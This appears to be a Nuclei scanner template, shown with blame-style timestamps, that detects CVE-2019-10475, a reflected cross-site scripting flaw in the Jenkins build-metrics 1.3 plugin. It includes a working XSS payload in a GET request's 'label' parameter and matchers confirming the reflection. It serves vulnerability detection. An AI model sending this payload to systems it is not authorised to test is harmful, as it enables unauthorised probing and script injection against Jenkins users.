2021-01-02 04:59:06 +00:00
id : CVE-2019-10475
2020-04-08 12:41:36 +00:00
info :
2022-08-12 00:45:50 +00:00
name : Jenkins build-metrics 1.3 - Cross-Site Scripting
2020-04-08 12:41:36 +00:00
author : madrobot
2020-05-25 07:49:06 +00:00
severity : medium
2022-08-12 00:45:50 +00:00
description : Jenkins build-metrics 1.3 is vulnerable to a reflected cross-site scripting vulnerability that allows attackers to inject arbitrary HTML and JavaScript into the web pages the plugin provides.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to a patched version of the Jenkins build-metrics plugin or apply the necessary fixes provided by the vendor.
2021-09-10 11:26:40 +00:00
reference :
- https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490
- http://www.openwall.com/lists/oss-security/2019/10/23/2
- http://packetstormsecurity.com/files/155200/Jenkins-Build-Metrics-1.3-Cross-Site-Scripting.html
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-10475
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2019-10475
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.97301
2023-11-20 05:10:39 +00:00
epss-percentile : 0.99842
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:jenkins:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : jenkins
product : build-metrics
2023-09-06 12:53:28 +00:00
framework : jenkins
2023-07-11 19:49:27 +00:00
tags : cve,cve2019,jenkins,xss,plugin,packetstorm
2020-04-08 12:41:36 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-04-08 12:41:36 +00:00
- method : GET
path :
- "{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"
2023-07-11 19:49:27 +00:00
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-08 12:41:36 +00:00
matchers :
2020-04-08 13:17:20 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-04-08 13:24:27 +00:00
words :
2020-05-25 07:49:06 +00:00
- "<svg/onload=alert(1337)>"
2020-12-13 19:24:23 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2020-12-13 19:24:23 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-11-19 08:30:54 +00:00
# digest: 4a0a00473045022100a55cc0d6c312f60079115676a918a0bc642e14cf0da74782cb0a204d4bba785302205cfbb54cc5d1c20b73e94e2a1e3dad75a9a325888ee19c028887058156979ad7:922c64590222798bb761d5b6d8e72950